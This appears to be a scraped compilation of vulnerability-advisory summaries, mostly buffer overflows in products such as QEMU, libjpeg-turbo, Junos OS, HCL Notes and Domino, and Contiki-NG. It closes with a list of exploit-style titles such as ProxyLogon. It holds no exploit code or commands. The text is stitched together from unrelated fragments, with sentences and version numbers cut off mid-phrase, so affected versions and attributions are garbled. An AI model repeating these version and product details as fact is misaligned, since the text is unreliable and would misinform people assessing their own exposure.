Buffer overflow in pdf2json 0. E products with versions of The program copies an input buffer to an output buffer without verification. An attacker in the adjacent network could send a crafted message, successful exploit could lead to stack buffer overflow which may cause malicious code execution.

Libjpeg-turbo all version have a stack-based buffer overflow in the “transform” component. A remote attacker can send a malformed jpeg file to the service and cause arbitrary code execution or denial of service of the target service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the kernel.

A heap-based buffer overflow was found in QEMU through 5. A guest user or process could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition, or potentially execute arbitrary code with privileges of the QEMU process on the host.

A stack buffer overflow vulnerability in the device control daemon DCD on Juniper Networks Junos OS allows a low privilege local user to create a Denial of Service DoS against the daemon or execute arbitrary code in the system with root privilege.

Versions of Junos OS prior to Multiple buffer overflow vulnerabilities exist when LeviStudioU Version and prior processes project files. A heap-based buffer overflow may be exploited by processing a specially crafted project file. A stack-based buffer overflow may be exploited by processing a specially crafted project file.

This occurs during packet transmission and affects the highbank and midway emulated machines. A guest user or process could use this flaw to crash the QEMU process on the host, resulting in a denial of service or potential privileged code execution.

This was fixed in commit ab43ecac60be This issue affects: Victure PC firmware version 1. These could be triggered by an extremely large number of arguments to the initrd command on bit architectures, or a crafted filesystem with very large files on any architecture. This issue affects GRUB2 version 2.

This issue will occur only when untrusted communication is initiated with server. In cloud, Agent will always connect with trusted communication. Multiple buffer overflow vulnerabilities exist in CGI scripts, leading to remote code execution with root privileges. The set of affected scripts is similar to CVE The driver’s IOCTL request handler attempts to copy the input buffer onto the stack without checking its size and can cause a buffer overflow.

This could lead to arbitrary Ring-0 code execution and escalation of privileges. This affects DirectIo The specific flaw exists within the handling of string table file uploads. An attacker can leverage this vulnerability to execute code in the context of the web server. In libIEC before version 1. This can cause an application crash or on some platforms even the execution of remote code. If your application is used in open networks or there are untrusted nodes in the network it is highly recommend to apply the patch.

This was patched with commit ab5b. Users of version 1. As a workaround changes of commit ab5b can be applied to older versions. Sophos XG Firewall Hotfix HF Buffer overflows were discovered in Contiki-NG 4. The function parsing the received SNMP request does not verify the input message’s requested variables against the capacity of the internal SNMP engine buffer.

This makes it possible to overwrite stack regions beyond the allocated buffer, including the return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function’s return address.

Softing Industrial Automation all versions prior to the latest build of version 4. The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code.

These flaws allow a malicious client or server to send specially crafted messages that, when processed by the QUIC image compression algorithm, result in a process crash or potential code execution. A vulnerability in the MIME message handling of the Notes client versions 9 and 10 could potentially be exploited by an unauthenticated attacker resulting in a stack buffer overflow.

This could allow a remote attacker to crash the client or inject code into the system which would execute with the privileges of the client. A successful exploit could enable an attacker to crash Domino or execute attacker-controlled code on the server system. A vulnerability in the MIME message handling of the Domino server versions 9 and 10 could potentially be exploited by an unauthenticated attacker resulting in a stack buffer overflow.

This could allow a remote attacker to crash the server or inject code into the system which would execute with the privileges of the server. A vulnerability in the input parameter handling of HCL Notes v9 could potentially be exploited by an authenticated attacker resulting in a stack buffer overflow. This could allow the attacker to crash the program or inject code into the system which would execute with the privileges of the currently logged in user.

A vulnerability in the input parameter handling of HCL Client Application Access v9 could potentially be exploited by an authenticated attacker resulting in a stack buffer overflow. A vulnerability in the MIME message handling of the HCL Notes v9 client could potentially be exploited by an unauthenticated attacker resulting in a stack buffer overflow.

This could allow a remote attacker to crash the Notes application or inject code into the system which would execute with the privileges of the currently logged-in user. There is a buffer overflow in librsa. The overflow allows an authenticated user to execute arbitrary code by POSTing to apply.

Air Force Sensor Data Management System extract75 has a buffer overflow that leads to code execution. An overflow in a global variable sBuffer leads to a Write-What-Where outcome. By controlling that pointer, one achieves an arbitrary write when its fields are assigned. The data written is from a potentially untrusted NITF file in the form of an integer.

The attacker can gain control of the instruction pointer. A stack buffer overflow in webs in Ruckus Wireless Unleashed through Code execution can occur via a custom AT command handler buffer overflow. MiniShare 1. Apache Continuum saveInstallation. Trend Micro Control Manager importFile directory traversal.

ColdFusion verifyldapserver vulnerability. HP System Management Homepage iprange parameter command execution. HP Diagnostics magentservice. Spring Framework Data Binding vulnerability. PineApp Mail-SeCure ldapsyncnow.

Microsoft Azure Open Management Infrastructure remote command execution. Oracle Database string conversion buffer overflow. Novell iManager getMultiPartParameters file upload vulnerability. Yahoo Messenger WScript. Shell ActiveX control command execution.

SafeNet PrivAgent. GitLab ExifTool uploaded image command injection. Microsoft Exchange Server ProxyLogon vulnerability. Citrix Provisioning Services streamprocess. Axis IP Camera authentication bypass and command injection. Liferay Portal Apache Felix command injection. HP Intelligent Management Center uam.

Atlassian Crowd pdkinstall arbitrary plugin installation. Serv-U Web Client session cookie handling buffer overflow. HP Photo Creations audio. ReGet Deluxe. Microsoft IIS 5. Internet Explorer inline content filename extension vulnerability.

Microsoft IIS. Microsoft SQL Server resolution service buffer overflow. Linux kernel ptrace privilege elevation vulnerability. FrontPage fp30reg. MDaemon WorldClient form2raw. Windows compressed folders buffer overflow. Microsoft WINS replication service pointer corruption.

SHOUTcast filename format string vulnerability. Solaris loadable kernel module directory traversal. Internet Explorer Content Advisor memory corruption. Computer Associates License Service invalid command buffer overflow. Microsoft Color Management Module profile tag buffer overflow. Internet Explorer COM object instantiation vulnerability.

ViRobot Server web interface addschup buffer overflow. RealPlayer invalid chunk header heap overflow. Oracle Security Component sys. Citrix Program Neighborhood name buffer overflow. Mercury Mail Transport System Phonebook service buffer overflow. Dataspace ActiveX control vulnerability. Mozilla Firefox QueryInterface method memory corruption. Safari archive metadata command execution. Internet Explorer isComponentInstalled buffer overflow.

Microsoft Visual Studio. Internet Explorer createTextRange memory corruption.